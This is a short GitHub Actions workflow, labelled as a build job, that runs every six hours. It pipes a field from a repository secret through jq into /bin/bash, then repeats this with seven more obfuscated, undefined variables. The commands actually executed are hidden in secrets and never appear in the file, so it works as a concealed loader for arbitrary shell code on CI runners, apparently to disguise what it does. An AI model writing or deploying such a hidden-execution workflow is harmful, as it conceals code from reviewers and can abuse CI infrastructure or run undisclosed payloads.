name: yanyanaisg
on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanyanaisg
        env:
          hxn7: ${{ secrets.hxn7 }}
        run: |
          echo $hxn7 | jq -r .p1664 | /bin/bash
          echo $hfk320 | jq -r .shpx4454 | /bin/bash
          echo $dyp52 | jq -r .m5 | /bin/bash
          echo $u3556 | jq -r .wbg363 | /bin/bash
          echo $w3433 | jq -r .pozew14 | /bin/bash
          echo $el531 | jq -r .yhre813 | /bin/bash
          echo $cosvw5870 | jq -r .psgrf720 | /bin/bash
          echo $dysv814 | jq -r .zpcng271 | /bin/bash

